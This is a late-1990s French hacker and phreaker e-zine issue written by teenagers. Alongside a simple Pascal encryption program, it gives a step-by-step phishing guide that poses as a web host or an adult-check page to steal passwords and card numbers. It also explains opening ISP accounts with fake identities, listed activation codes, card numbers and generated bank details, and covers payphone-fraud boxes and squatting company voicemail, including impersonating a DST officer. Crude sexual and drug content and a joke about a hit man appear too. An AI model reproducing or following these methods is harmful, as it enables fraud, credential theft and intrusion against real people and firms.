DeathlyBy pour m'avoir accepter dans leur équipe ** ** Ma mère qui paye mes factures FT (France Télécon pour ceux ki auraient pas capté! ) ** ** Mes potes de Bahut: mini-kiss,frisk,rafale,moune ** ** Mes potes de #ioda (bisous aux filles!) ** ** Tous les lecteurs de cet e-zine et tous ceux ki m'ont aidé à mieux comprendre l'underground !!! ** ** Et aussi à tous les rédacteurs d'e-zines !!!(Snowcrash !) ** ********************************************************************************************************************** Proverbe d'outre internaute : mieux vaut un petit lamer de base ki trvaille plutôt k'une élite ki se la coule douce ! ================================================================================================ Pourquoi je hacke??? By Faust ================================================================================================ Vous m'avez déjà plusieurs fois demandé pourkoi je hackais; ce n'est pas pour faire chier le monde, mais c'est un plaisir Il est vrai ke je n'ai pas pénétré beaucoup de machines (2 avec l'exploit Netbios et 3 avec le troyen et une au master paradise :) ) mais lorske j'ai réussi à rentrer sur le réseau de mon bahut, et de leur faire imprimer une foto de profs trukée avec écrit dessous : "il ne faut jamais sous-estimer les capacités de ces élèves" et ben j'ai hurlé de joie, et j'ai dévalé les escaliers comme un fou !!! (chez nous, y'a 3 étages) Ma mère m'a demandé si je ne devenais pas fou; je lui ai tout expliké, elle à compris (donc vous aussi non?) En fait , je suis connecté à internet depuis avril 98, et en septembre, alors ke j'étais trankilou sur irc, mon dd se met à gratter comme un fou; je me dis "MERDE, pourkoi il fait ça lui?" je ne savais pas encore k'aprés ma connection, mon répertoire photo1 avait disparu (euh...si le hacker se reconnais, il a du avoir une surprise en l'ouvrant car ce n'était ke des fotos ke j'avais fais de mes profs alors...!) Je télécharge donc un firewall et son crack sur les conseils d'un pote; je me crois invincible, mais 2 mois après, même shéma: je suis sur IRC, il est 22h, mon dd s'affole et une boîte de dialogue apparaît:"Veuillez patienter pendant ke nous déplaçons vos fichiers en base mémoire" a ce moment là, j'ai sauté sur mon modem et arraché la prise. Je télécharge donc le "Bouffe troyen" (pour l'adresse, m'envoyer un mail passke j'm'en souviens plus) J'étais inffecté par le socket 2.3, et backoriffice. (pas cool ça!) Et puis, il y a un mois, sur IRC, chez un pote, son PC tapait du texte tout seul !(Casper, c'est toi?) Alors voilà, j'ai lu tout ce ke je trouvais, et j'ai réussi kelkes trucs, mais je ne me considère pas comme un hacker. (je ne juge pas ke je suis assez bon pour avoir ce titre, je pense ke je suis un type ki s'y connais un tout tit peu et ki fait profiter de son savoir à d'autres.) Si j'ai hacké mon bahut, c'est passke le prof d'informatike m'a qualifié de bidouilleur, et ke ça m'a pas plu ! (ouais, bon il faut toujours un prétexte alors voilà! :) ) Je me suis aussi essayé au crack, et j'ai été aidé par Le Magicien et Simon TêteCreuse, mais bon, je suis encore débutant ! Règles du hacker: - toujours être disponible et patient - être discret, prendre une addresse e-mail genre caramail ou hotmail - se sous-estimer pour deux raisons: - La persone ke vous avez en face ne se méfiera pas - Vous ne serez pas surpris par des questions auxkelles vous ne pouvez pas répondre - Ne jamais effacer des trucs d'un dd sauf si c'est un pédophile à la con ! (je peux pas les supporter !) - Soyez toujours prêts à faire partager votre savoir (si à l'âge de 8 ans je savais tout ce ke je sais , à l'âge actuel, arrivé à l'âge où je suis,j'en saurais davantage !) - Veillez à ne pas laisser de traces (masquez votre ip, connectez-vous à un proxy bidon) - il n'est jamais trop tard pour apprendre (je commence à apprendre à programmer et je projette déjà de vous pondre un prog ki encrypte et décrypte vos messages !!! je sais, c'est pas gagné, mais je demanderais de l'aide !!!) Voilà, c'est tout, j'espère ne pas vous avoir trop pris la tête avec tout ça, mais c'était pour vous montrer ke tout le monde peut devenir un hacker (il suffit de s'accrocher, être curieux et ne pas hésiter à demander des conseils !!!) Sur ce, bonne continuation ! A bientôt, si j'ai pas trop de boulot au bahut! *** You were kicked by FAUST *** *** Now you are disconnected *** faust19@caramail.com irc.funradio.fr #ioda ou #Mat "I can't beleive the news today I can't close my eyes and make it go away" .U2 Sunday Bloody Sunday. Ndcedru : Super tu as réussi l'exploit netbios (nbtstat grâce à deathlyby j'espere? :) heu sinon avec des trojans c'est un peu simple comme méthode je trouve, mais ça se démocratise de plus en plus les hackers (hier encore j'en ai vu à la TV) maintenant tu as plein de programmes,trojans... tu as juste à clicker sur un button et ca marche. Je me rappel à mon époque ou on devait tapper plein de commandes, chercher un peu, aller sous dos... Maintenant tout se perd ;) ================================================================================================ Le cryptage, suite By DeEPspY ================================================================================================ Pour faire suite au texte de Faust, je vous propose de vous expliquer un petit prog que j'ai fait en pascal pour crypter des fichiers. Le fonctionnement de ce prog est assez simple. Il faut donc un fichier, par exemple essai.txt avec quelque chose dedans, ici il sera ecrit: salut et puis donner au prog un mot de passe: ici ce sera: az . Le programme va donc lire le premier caractere du fichier, ici s et prendre sa valeur ascii, pour s=115, puis il va lire la premiere lettre du mot de passe, ici a et va aussi prendre sa valeur ascii, a=97 puis il va ecrire dans un nouveau fichier le caractere qui correspond a la somme des deux valeurs ascii, 115+97=212 , nous aurons donc le caractere È . Puis le prog prend la deuxieme lettre du fichier avec la deuxieme lettre du code, ainsi de suite, quand on arrive a la fin du mot de passe on reprend au debut et si la somme des valeurs depasse 255 on soustrait 256. Pour decoder le fichier, le programme marche de la meme maniere, il faut donc avoir le mem mot de passe, sinon le fichier n'est pas le meme du tout. J'ai ete claire??? Bon je vous montre maintenant le code source pour turbo pascal 6.0 les explication sont notees entre {} Program codeur; uses crt; Var ObjFile : String[80]; SrcFile : String[80]; Passe : String[80]; InpFile : File of Char; OutFile : Text; B, ChVal, Cpt : Integer; Ch : Char; PROCEDURE Usage; {explication si on lance le exe sans ligne de commande} Begin TextColor(Red); Gotoxy(25,25); Write('Codeur (Version 1.0)'); Writeln(' Ecrit par DeEPspY'); Writeln; TextColor(7); Write('Codeur est tout simplememt un programme qui code vos fichier ;-}'); Write(' et qui les rends donc inlisables. Il est conseiller de l''utiliser avec Decodeur, '); Write('ce qui serait plutot utile pour decoder vos fichiers.'); Writeln; Writeln; Write('Ceci est fait par une addition et une soustraction des valuers ascii donnee dans'); Write(' le mot de passe ,specifie par l''uitlisateur, avec les valeurs ascii du fichier. '); Writeln; Writeln('Ce programme est l''ouvre de DeEPspy pour le mag DEATHLY BY '); Writeln('Pour coder un fichier :'); Writeln('C:>codeur [source] [destination] [mot de passe]'); Writeln; End; PROCEDURE GetParams; {saisi le nom du fichier a coder, la destination, et le mot de passe} Begin If ( ( ParamCount <> 3 ) ) then Begin Usage; Halt; End Else Begin SrcFile := ParamStr(1); For B := 1 to Length( SrcFile ) Do SrcFile[B] := UpCase( SrcFile[B] ); ObjFile := ParamStr(2); For B := 1 to Length( ObjFile ) Do ObjFile[B] := UpCase( ObjFile[B] ); Passe := ParamStr(3); End; {Initial Else...} End; { GetParams } PROCEDURE OpenFiles; {ouvre la source} Begin Assign(InpFile, SrcFile); {$I-} Reset(InpFile); {$I+} If (IoResult<>0) Then Begin Writeln('Fichier: ', SrcFile, ' non trouver.', #7); Halt; End; Assign(OutFile, ObjFile); Rewrite(OutFile); End; PROCEDURE Process; {le + important, le cryptage} Begin Cpt := 1; While Not Eof( InpFile ) Do Begin Read(InpFile, Ch); {lit la premiere lettre} ChVal := Ord( Passe[ Cpt ]) + Ord( Ch ); {nouvel letre = ascii de la premiere letre du mot de passe+ ascii de la premiere lettre} If ChVal > 255 Then {si > 255 on soustrait 256} ChVal := ChVal - 256; Cpt := Cpt +1; {on prend la deuxieme lettre du mot de passe, et si le mot est fini on recommence a 1} If Cpt > Length( Passe ) Then Cpt :=1; Write(OutFile, Chr( ChVal )); {on ecrit dans le nouveau fichier} End; {while} End; {Process} PROCEDURE CloseFiles; {on ferme tout} Begin Close(InpFile); Close(OutFile); End; BEGIN {programme principal} GetParams; OpenFiles; Process; CloseFiles; END. C'est tout simple non? Bon je vous donne aussi le code pour decrypter, le voici. le fonctionnement est presque le meme que pour coder. Program Decodeur; Uses crt; Var ObjFile : String[80]; SrcFile : String[80]; Passe : String[80]; InpFile : File Of Char; OutFile : Text; B, ChVal, Cpt : Integer; Ch : Char; PROCEDURE Usage; Begin TextColor(red); Gotoxy(25,25); Write('Decodeur (Vers. 1.0)'); Writeln('Ecrit par DeEPspY'); Writeln; TextColor(7); Write('DECODEUR sert a decoder un fichier qui a ete code par '); Writeln('CODEUR (et pas un autre).'); Writeln('Ce programme est l''oeuvre de DeEPspY pour le mag DEATHLY BY'); Writeln; Writeln; Writeln('Pour decoder un fichier :'); Writeln('C:>decodeur [source] [destination] [mot de passe]'); Writeln; End; PROCEDURE GetParams; Begin If ( ( ParamCount <> 3 ) ) then Begin Usage; Halt; End Else Begin SrcFile := ParamStr(1); For B := 1 to Length( SrcFile ) Do SrcFile[B] := UpCase( SrcFile[B] ); ObjFile := ParamStr(2); For B := 1 to Length( ObjFile ) Do ObjFile[B] := UpCase( ObjFile[B] ); Passe := ParamStr(3); End; {Initial Else...} End; { GetParams } PROCEDURE OpenFiles; Begin Assign(InpFile, SrcFile); {$I-} Reset(InpFile); {$I+} If (IoResult<>0) Then Begin Writeln('fichier: ', SrcFile, ' inexistant.', chr(7)); Halt; End; Assign(OutFile, ObjFile); Rewrite(OutFile); End; PROCEDURE Process; Begin Cpt := 1; While Not Eof( InpFile ) Do Begin Read(InpFile, Ch); ChVal := Ord( Ch ) - Ord( Passe[ Cpt ] ); If ChVal < 0 Then ChVal := ChVal + 256; Cpt := Cpt +1; If Cpt > Length( Passe ) Then Cpt :=1; Write(OutFile, Chr( ChVal )); End; {while} End; {Process} PROCEDURE CloseFiles; Begin Close(InpFile); Close(OutFile); End; Begin GetParams; OpenFiles; Process; CloseFiles; End. Voila, si vous utilisez ce prog tel quel, laissez mon nom, et si vous apportez des amelioration, faite moi signe : deepspy@caramail.com C'est rien qu'un petit prog mais c'est deja pas si mal, meme si ca vaut pas Georges Sand. ================================================================================================ Le SE via HTML by Deepspy ================================================================================================ Voici comment faire du SE sans trops de problemes pour ceux qui ont la voie qui chevrote au telephonent, mais aussi pour ceux qui veulent se venger en dtruisant les sites de leurs ennemis, ou encore pour ceux qui voudrait des passes pour les sites XXX. En fait ce qu'il faut c'est d'abord s'inscrire sur un hebergeur de site (Multimania, chez, respublica, citeweb, xoom,...) puis choisir un nom evocateur, tout cela depend donc de ce que vous voulez faire. Pour avoir des passes de sites XXX il vaut mieux prendre un nom attirant, pour pouvoir hacker un site un nom comme aide24, info8, probleme,... Ensuite il faut creer une page qui fasse reel, avec des photos X pour un site de culs, avec un fond que l'on rencontre habituellement chez son hebergeur, n'hesiter donc pas a pomper ca sur d'autres sites. Ensuite tout depend de ce que vous voulez faire, on va donc traiter 2 possibilités. Vous voulez legerement transformer le site d'un ami, il faut donc lui envoyer un email avec votre pseudo (aide24, probleme2, info5,...) et lui dire qu'il y a actuellement un probleme (n'oubliez pas que vous devez vous faire passez pour l'hebergeur) et qu'il faut donc qu'il vienne sur votre page pour modifier 2 ou 3 trucs. Il faut que votre email fasse vraiment realiste, alors n'en mettez pas trop peu et pas trop trop .Comme vous aurez fait une belle interface graphique, votre pigeon va y croire et vous allez pouvoir lui demander son login et son password, grace au script html si dessous.

Login  : 


 
Password : 
Et voila le gros pigeon vous a donné tout ce que vous vouliez, il ne vous reste plus qu'a utilisez FTP pour lui balancer les belles pages que vous avez preparées. Maintenant vous voulez obtenir des mots de passes pour des sites de culs ou des numero de cartes bancaire. Alors comme vous avez deja essayer les sites de culs vous savez qu'il y a un trucs tres repandu qui s'appelle adult check, alors vous allez sur un site ou il y a ca et vous copiez la page. Ensuite vous vous faites une bonne petite page de presentation bien hard, il faut que ca donne envie, puis vous mettez la page que vous avez copiez, en vous arrangent pour que votre script vous envoie toutes les infos, votre site en place, il ne vous reste plus qu'a passez des annonces pleins les newsgroup, de faire un peu de spawn et le tour est joue, si votre site est bien fait, plein de gogos vous enverrons les infos que vous voulez. Et voila comme quoi c'est pas compliquee de faire de belles choses avec un brin d'html. ================================================================================================ Bienvenue Chez le Dr M@x. ================================================================================================ Voici mon test de pureté : Si tu repond a ce test c'est que tu ne connais pas encore tres bien tes vices, laisse moi t'aider a les trouver : Partie concernant l'alcool : 1 - Un samedi soir vos amis organisent un visu dans un bar, et vous proposent de boire avec eux, vous commandez donc : A - un lait-fraise. B - une bière pression. C - un whyski. 2 - Apres avoir bien discuté, vos amis reprennent un verre, vous reprennez : A - rien vous n'avez pu d'argent. B - une autre bièré. C - 2 cockails, car vous trouvez le service trop lent. 3 - Arrivé a 2 h 00 du matin, le bar ferme, vous : A - rentrez chez vous. B - suivez les autres qui decident d'aller dans un autre bar. C - incitez d'autre personne a aller boire un dernier verre ailleur. 4 - A peine entré dans l'autre bar, le serveur vien prendre votre commance, vous : A - ne prenez rien vous avez deja assez bu. B - demandez d'abord aux autres ce qu'ils prennent. C - commandez un cocktail. 5 - Vous rentrez chez vous apres la soirée, et vous vous endormez vous revez de : A - la nouvelle renault qui vient de sortir. B - d'une jolie fille acoudé a un comptoire. C - vous bourrez la gueule. Questions sur le sexe : 6 - Vous marchez dans la rue, et croisez un joli garcon ou une jolie fille, vous : A - baissez les yeux. B - demandez du feu. C - lui donnez votre numero de tel. 7 - Parti pour prendre l'air, vous tombez sur une/un prostitué, vous : A - passez votre chemin. B - acceptez sa proposition. C - essayez de baisser le prix. 8 - Une soirée s'organise dans un bar tres Hot de paris, vous : A - avez mieux a faire. B - vous y allez sans trop poser de question. C - vous passez a la bank avant. 9 - Lorsque vous jouez au loto le mercredi soir, vous : A - ne jouez pas. B - cochez les numeros du tel d'un ou d' une ami(e). C - cochez les numeros qui font references aux positions du kamasutra. 10 - Dans le lit avec votre petit(e) ami(e), vous : A - vous laissez faire. B - vous touchez vivement le sexe de votre partenaire. C - vous avez vu mieux. Question sur la drogue : 11 - Des amis vous invitent a une soirée, et vous propose differentes drogues, vous : A - n'y touchez pas. B - regardez mais ne consommez pas. C - vous preparez votre 3 feuilles. 12 - Une personne passe dans la rue, et vous propose de signer une petition pour la légalisation du canabis, vous : A - faites celui qui a rien entendu. B - signez sous un faux nom. C - demandez a pouvoir signer sous plusieur nom. 13 - Pour vous, vous relaxer c'est : A - dormir. B - fumer une cigarette. C - fumer une matiere illicite. 14 - En rave party, vous : A - n'y allez jamais. B - consommez du teuchi. C - avalez des cachetons d'ecxtasy. 15 - Un de vos ami vous offre une cigarette, vous : A - ne fumez pas. B - fumez la cigarette. C - conservez la cigarette, pour prendre le tabac et le melanger a un douc produit relaxant. FIN DU TEST Le diagnostique du Dr Bilbo : Vous avez une majorité de A : BRAVO !!! ...ca pour etre pure vous etes pure !!! ( tu as deja vu un monsieur tout nu ? ). Allez quoi decoince toi un peu, le peusfli ca se comprend.... mais as tu deja vu une kekette si tu es une fille ? ou une bonne chatte humide si tu es un homme ? allez t' en fait pas, tu as au moins la fierté d'etre pure. Vous avez une majorité de B : C PAS TROP MAL !!! Vous etes dans la moyenne, c'est a dire , le genre de fille ou de gar ki ne fait pas l'amour 2 fois de suite...ou bien celui qui n'aurait pas envie de retremper ca queue dans son sperme, ou celle qui n aurait pas envie de ravaller le sperme en resucant son mec....Quand a l'alcool, bah restez a la bière. Vous avez une majorité de C : DESESPERENT !!! OULAH malheureux(se)!!! recommence vite ce test et triche un peu ....sinon, si tu es une nana contacte moi par ICQ (xxxxxxx) et je te propose gratuitement d'arriver a la phase D du test... :o) ALLEZ bonne bourre a tous ! made by M@x. NdCedru : moi j'ai X me demande pas comment j'ai fait, je ne le sais pas! ;) ================================================================================================ Comment créer un compte gratuitement chez Provider BY Krtman ================================================================================================ Club-internet : 6BCD00100000266 2D370010000002B 3BDA00100000086 297b00100000060 JOIU582NF JOY STICK87 FIJEC4121 Aol : 4P-4841-2583 BLEARS-TWINE 4R-4720-4055 TWEAKY-SHUN 2M-8270-4374 ETUDE -CHIRPS 4X-8458-8029 DIVVY-SCRAWL Compuserve: Offre/contrat :295723839 Serie : 1515 CB master card: 5130 6468 3321 5256 5/99 5130 9764 0115 4128 8/99 5130 9238 4280 1982 10/99 5130 8588 7908 2207 11/99 5132 7231 3490 7069 9/99 Pour créer un compte gratuit chez un fournisseur d'accès Internet comme Aol, Club-internet ou compuserve c'est très facile. Il suffit de prendre quelques précautions, et d'appliquer la méthode suivante. Tout d'abord vous devez avoir un kit de connexion gratuit que l'on trouve dans certains magazines ou avec un modem. On peut également le demander directement au Fai. Vous devez maintenant installer le kit sur votre Machine, puis lancer l'abonnement. Ils vont vous demander des infos sur vous, pour des raisons évidentes de sécurité entrez de fausses cordonnées faux nom, prénom... Ensuite entrez le code qui vous est demandé il figure généralement sur la pochette du cd ( si vous avez un kit mais que les codes ne sont plus valide utilisez ceux ci-dessus ;-)). Maintenant on vous demande votre n° de carte bancaire ou un autre mode de payement. - Chez Aol choisissez "autre mode de payement" et "prélèvement automatique". Utilisez un logiciel pour générer un faut numéro de compte RIB (relevé d'identité bancaire on en trouve plein sur le net le fichier bank.html permet d'en generer) entrez le RIBet le nom de la banque ( BNP par exemple ). Vous avez juste a valider et le tour est jouer. - Chez Club-internet et les autres préférez le n° de carte bancaire. Générez en un avec un logiciel ou utilisez ceux ci dessus ( Visa ou master card cela a peut d'importance ). La méthode des CB ne marche pas a tout les coups. Si c'est le cas changez de numéro de CB jusqu'a ce que sa marche. notez bien le login et le password au cas ou vous en auriez besoin (pour configurez un logiciel de mail par exemple). - Vous pouvez également créer une connexion en utilisant les mots de passe et login d'une personne que vous avez hacké avec un troyen ou avec un exploit. ( exploit ;-)))) = hacker un ordi en utilisant le bug des partages de fichier de windows). une foi les passes récupérés grâce a un prog, créez une nouvelle connexion d'accès réseau distant avec les login et pass récupérés. Conseille: -n'envoyez jamais de mail avec des information vous concernant dessus. -essayez de résilier l'abonnement a la fin de la période d'essais -changez de n° de CB a chaque nouvelle abonnement. -utilisez des FAI avec beaucoup d'utilisateur (Aol,Club-I..) on vous retrouvera moins facilement. Toutes ces méthodes marchent parfaitement, je l'ai est testé. si vous en connaissez d'autre envoyez moi un mail. Maintenant vous pouvez hacker safe. (safe = sans risque) Ecrit par "Krtman" apprenti de la force noir dans le monde du hacking... ================================================================================================ RED BOX by Doc ================================================================================================ Putains y à marre des lamers,ils sont partout!! La semaine dernière, un pauvre type m'envoie un message sur ma box pour me demander comment trouver l'outdial d'Hilti France et si ca craignait pas de consulter sa box depuis chez lui!!! Mais revenons a nos moutons, l'autre fois j'étais sur alt.privacy et quelqu'un a demandé c'est quoi une Red Box et comment ca marche? Facile !! Lisez ce qui suit (merci à C3PO pour son filez qui m'a bien aidé) La Red Box c'est quoi ? La Red box nous vient des States (encore eux;-) mais je sais pas si on peut l'utiliser en France. Au depart c'était un petit appareil qui émettaient des sons ou des tonalités numériques. Jusque la rien de special mais en la modifiant on a entre les pognes un formidable outil!! Mais comment on la modifie? Il suffit de remplacer le quartz d'origine (d'environs de 3,57945MHZ) par un autre de 6,5536.Votre RB est prete en 5 min montre en main!!Apres il faut programmer le son de pieces inseres dans telephone payant.Eh la ,tu composes ton numero et au moment ou il faut payer,utilises ta RB pour emuler l'argent soi disant inseres dans l'appareil. Voilà maintenant tu peux caller gratos avec la plupart des telephones payants. Si vouler pas l'acheter d'origine on trouve des plans et des docs sur le net pour en construire une, si vous trouver toujours pas===>amadho@mail.excite.fr Pour information il y d'autres boites qui furent développée. Voici les plus intéressantes: Blue Box:Prend le contrôle des lignes telephoniques en utilisant une tonalité de 2600 MHZ. Du coup on obtient les memes privileges que l'opérateur.Malheuresement elle a disparue à cause des nouveaux systemes telephoniques(commutation electrique) Mais on m'a dit que dans certaines parties des States on peut toujours l'utiliser car ces cons ont laissés l'ancien systeme!!! Dayglo Box: on utilise la ligne de phone de son voisin (celui qui fait du bruit à 6h00 du mat le dimanche rien que pour descendre ses foutues poubelles!! ;-)et on peut caller a l'oeil!! Aqua Box: Permet de detourner les ecoutes et les filatures eventuelles du FBI en filtrant le voltage de la ligne. Mauve Box: Permet d'ecouter une ligne telephonique(poa bien ca;-) Chrome Box: Prend le contrôle des signaux du traffic.Personnellement j'ai pas reussi a comprendre comment elle marche jusqu'ici mais je crois que ca vaut le coup!Donc si vous avez compris un truc===>amadho@mail.excite.fr BlueBEEP: tout bon phreaker qui se respecte doit avoir BlueBEEP dans sa toolbox. Il combine differentes techniques de la plupart des Box connues. On a un contrôle assez important sur le systeme téléphoniques. Il tourne sous DOS, Windaube(95 ou NT) la prochaine fois promis j'explique comment il marche... ================================================================================================ Scan de la VMB "VOCALE" du parlement européen by Doc and Madmax numero:0 800 9069 69 ================================================================================================ Principales Commandes: 2)Ecouter le programme d'un collegue *selection d'un interprete par matricule touche 1 *selection d'un interprete par nom touche 2 0)Quitter VOCALE 7)Informations generales *)Re-entendre les options 3)Rappel des correspondances chiffres-lettres du clavier styles 2=ABC 3=DEF... Voila une vmb tres facile a hacker pour les debutants;-) Les commandes sont nulles a chier :on peut pas envoyer de msg... Mais c'est deja ca. Quand vous callez un type demande directement votre numero donc pas de# ou* et tout le tralala!! Si vous trouver pas numero en voici 123456. Sinon pour les autres mailez moi!! Ndcedru : Ouip j'ai essayé un peu et je voulais accéder à des boites aux lettres.J'ai essayé les codes 234567 et 345678 et 456789 et il n'y a personne! :( on peut composer le nom du type faisant partie du parlement européen, j'ai essaye Delors mais à partir du o qui correspond à la touche 0 qui fait déconnecter du vmb.Donc si vous trouvez des matricules envoyez les nous! NdDRooPY: Je veux pas jouer le rôle du chieur de service mais à quoi ça va servir de connaître un autre n° à part à connaître l’emploi du temps du type ? Ah oui j’ai une idée : On dit à un tueur à gages que le type du parlement sera tel jour à telle heure à tel endroit et on se fait payer bien sûr !!! ================================================================================================ Comment utiliser correctement le 0800 397 397 partie 2 By Mufum ================================================================================================ By MufUm le 03/03/1999 Et ben me revoilou pour des petits ajouts à mon article précédent ; ) Bon le mag deathlyby4 est sorti y' a peu de temps (une semaine à peine) et déja une petite dizaine de phreakers ont établi domicile sur la boite vocale d'hilty je les remercie tous pour leurs messages de remerciements (arf) Et sachez tous que Cedru, Heatwork666,Fugitif et DRooPY s'y sont installés Je rappelle que ces 3 ( DRooPY: hum 4, non ? Ah oui c’est vrai je compte pas ...:-)) ) personnes écrivent des articles dans Deathlyby La_crapule aussi (c'est un membre fondateur du galaad underground) Bon les choses sérieuses maintenant ; ) Grand 4 : Quelques explications techniques... Je vais vous exposer brievement comment ca fonctionne... Voila à chaque boite vocale correspond un poste de l'entreprise, la majorité des postes sont occupés par les employés. Lorsqu'on appelle un employé sur sa ligne directe (comme kan vous appelez papa au bureau) le téléphone sonne chez lui (arf) mais au bout de 3 sonneries si l'employé n'a pas répondu le répondeur se met en marche et chez Hilty le répondeur c'est (certains l'ont déja deviné) LA BOITE VOCALE!!! Donc la boite que vous utilisez est peut-etre le répondeur de qelkun d'autre . D'ailleurs g un pote ki à été obligé de changer de boite pask'il y avait une meuf de chez hilty dessus. Ce que je viens d'écrire ne vous servira absolument à rien si ce n'est à vous coucher moins bete ce soir. Grand 5 : Comment aller + vite Bon maintenant vous avez votre boite vocale, vos potes aussi. Vous vous envoyez des messages tous les soirs, tout va bien... Mais vous etes pitetre dans le meme cas ke moi c'est à dire que chaque soir quand vous allez consulter votre boite vous entendez ceci : "10 ou + nouveaux messages" . En effet je recois une dizaine de messages par jour. Quand je suis chez moi je reste accroché une demi-heure au téléphone (le temps de répondre à tout le monde). Et une demi-heure c'est un peu long... Voici maintenant comment fonctionne un phreaker normal : Il appelle hilty puis appuie sur ## puis son n° de boite, la il écoute son nom puis il tape son code quand la dame lui dit. ensuite il écoute ses messages un par un puis il répond à chacun d'eux. Mais kan vous avez 10 messages et que les mecs ne vous donnent pas leur n° vous ne pouvez pas leur répondre Et après 10 messages est-ce que vous vous souvenez de quoi chaque mec à parlé ? Moi pas. Donc voici quelques petites astuces pour gagner du temps : Pas besoin d'attendre que a meuf ai déballé tout son speach dès que ca a décroché vous tapez ##+n°boite+code Lorsque vous venez d'écouter un message, au moment ou la meuf vous demande si vous voulez le réecouter,l'effacer etc... vous tapez 5 c'est la fonction "répondre" autrement dit vous envoyez directement une réponse à l'auteur du message (plus besoin d'attendre que tout les messages soient passés) et voilou! Grand 6 : les commandes Voici pour votre plus grand plaisir une liste détaillée des commandes disponibles : 1 : déposer un message à un destinataire 2 : accéder à votre boite vocale Une fois dans la boite : 1: consulter les messages 1 : consulter les nouveaux messages 2 : consulter les anciens messages 2 : envoyer un message 1 : envoyer un message à une autre boite vocale 3 : personnaliser sa boite 1 : modifier les annonces (inutile) 2 : Nom 1 : écouter son nom 2 : enregistrer son nom 3 : autres options 4 : modifier son code secret 4 : vérifier l'arrivée de vos messages vous tapez un n° de boite : cela vous permet d'écouter le dernier message que vous avez envoyé à cette boite 5 : accéder à une autre boite vocale 0 : accéder au pabx Actions sur un message recu 1 : réecouter le message 2 : archiver et passer au message suivant 3 : effacer le message 4 : déposer une copie 1 : déposer une copie à une boite vocale 1 : ajouter un commentaire 2 : envoyer sans commentaire 5 : répondre au message (très pratique ; )) Actions sur un message que vous venez d'enregistrer 1 : réecouter le message 2 : déposer et sortir 3 : Grand 7 : Comment vous sauver lorsque votre boite se révèle habitée Voici un truc nettement plus interréssant ; ) Je vais vous raconter précisément ce qui est arrivé à mon meilleur pote et comment je l'ai sauvé (quel héros ce MufUm !) J' ai l'habitude d'envoyer à mon meilleur pote (meme si il habite à 20 min de chez moi) un message par soir. Mais il y a semaine j'ai recu un message venant de lui mais qui avait été envoyé pendant une heure d'ouverture de la boite, ce message disait "Tu vas arréter d'envoyer des messages à ma copine !" Et bien sur ce n'était pas du tout la voix de mon meilleur pote ! Hier j'ai recu un message venant de mon meilleur pote (toujours à une heure d'ouverture des bureaux!)Mais là c'était une voix de fille qui me disait "je recois des messages qui ne me sont pas déstinés, quelqu'un peut m'expliquer ? " Donc il y a 5 minutes j'ai été sur la boite du pote (je connais son code : )) et j'ai fait ceci : -j'ai éffacé tout les messages (y'en avait qui était de sa copine c'était pas mal croustillant ! ) -j'ai réenregistré son nom (à la place du nom qu'il avait mis j'ai mis un blanc comme pour faire croire qu'il n'y à personne) Puis j'ai fait un joli coup de bluff qui j'éspère à fonctionné J'ai envoyé un message sur cette boite (la meuf devrait écouter ce message demain matin) voici ce que j'ai dit "Bonjour ici jean-bernard Condat (pour ceux qui ne le savent pas c un mec de la DST) nous avons intercepté des gens exterieurs à l'entreprise qui utilisaient le n°vert du service client pour obtenir une messagerie gratuite, nous avons surveillé les boites qu'il "squattaient" pour récupérer des informations nous avons retracé leurs appells et prévenus leurs parents, vous ne serez désormais plus importunée par des messages qui ne vous sont pas déstinés au revoir et bon travail. " NdDRooPY: J’ai qu’un mot à dire : Chapeau !!! ET voila ; ))) Maintenant vous savez quoi faire en cas de problème Derniers petits conseils : -respecter au maximum les consignes de sécurité -ne déconnez pas avec les employés plus vous les laisserez tranquille moins ils sauront ke vous etes là ! (logique non ? ) -Le but est de faire vivre cette boite vocale le plus longtemps possible et je compte sur vous pour qu'elle remplace l'ex-boite vocale LEGO Et je compte aussi sur vous pour qu'elle soit plus conviviale que celle d'edf. C'est tout pour aujourd'hui Pour tout contact, infos à demander, infos à donner, remerciements... mufum@caramail.com ou la boite vocale 5349 ! MufUm Ps: à venir dans le 3 eme article : comment aller encore + vite comment faire la gueguerre les problemes que l'ont peut rencontrer et seulement pour les personnes que je connais bien (mais oui tu l'auras cedru ! ) le scan complet de toutes les vmb's NdDRooPY: Merci pour moi ! :-) ================================================================================================ Une après-midi avec les rédacteurs de Deathly-by By DRooPY ================================================================================================ (Vue par DRooPY) Alors voilà, Cedru, Fugitif,Heartwork666 et moi on décide de se retrouver un samedi après-midi pour discuter et hacker des VMB dans le but d'écrire un article ( oui bon celui la ne parle pas de VMB mais c'est quand même un article, non ?). On a un RDV à 15h devant un lycée. 14h50: Bien entendu, j'arrive le premier.Il fait beau, chaud, c'est le printemps, les oiseaux chantent, le soleil brille, le ciel est bleu ( non je ne me prends pas pour celui de la météo Gillot-petré je-sais-pas-quoi ). 15h00: Cedru et HeartWork ( oui vous savez c'est celui qui hiberne :-) ) arrivent sans se presser.Fugitif arrive quelques minutes après.Ca y est on peut commencer. Direction : les cabines les plus proches. On met du temps pour y arriver: Cedru n'arrête pas de s 'arrêter pour mater les Q qui passent. Ses goûts sont assez bizarres mais bon passons... Pour les lectrices qui seraient interessées, je précise que les tranches d'âge préférées de Cedru sont les 5-10 ans :-)) 15h10: Ca y est on est aux cabines. Chacun s'en prend une ( une cabine bien sûr bande d'esprits tordus !!!) et on commence à jouer. J'écoute mes messages sur le 0800 397 397 : Ma boîte perso est saturée de messages, j'en reçois en moyenne 15 par jour. 15h20: Cedru est fasciné de nous voir tous en pleine action et sort de son sac à malices un appareil photo jetable datant des années 60... Et il nous prend tous les trois en train de téléphoner. Cedru est quelqu'un qui s'interresse à tout et qui aime faire partager aux autres son savoir: quand il sera de retour dans sa tribu, il va montrer aux autres ce qu'est la civilisation et ce qu'est un téléphone. Ce jour n'était pas le bon : on n'a pas trouvé grand chose sur ces VMB... 15h50 : On se retrouve assis dans un bar : HeartWork boit une tequila et fume comme un pompier ( heureusement ce n'est pas des joints :-)), Cedru boit un whisky-coca, Fugitif lui a pris un Martini. Moi, je bois une grenadine. Il faut bien que quelqu'un garde l'esprit clair dans une bande d'alcolos ! On discute, mais j'ai l'impression de parler dans le vide avec cette bande de lamers... 16h10: Tout le monde recommande la même chose, sauf moi, j'ai plus soif... Cedru se fait des torticolis à se retourner tout le temps pour mater, c'est pas grave, c'est l'âge, ça passera... Ils recommandent la même chose, encore et encore... 16h40: HeartWork a fumé 3 paquets, et tout le monde a un gramme de sang noyé dans un litre d'alcool, sauf vous l'avez deviné, MOI ! HeartWork se casse : on n'est plus que trois... 16h50: On se casse, moi au milieu, Fugitif d'un côté,Cedru de l'autre, ils s'appuient 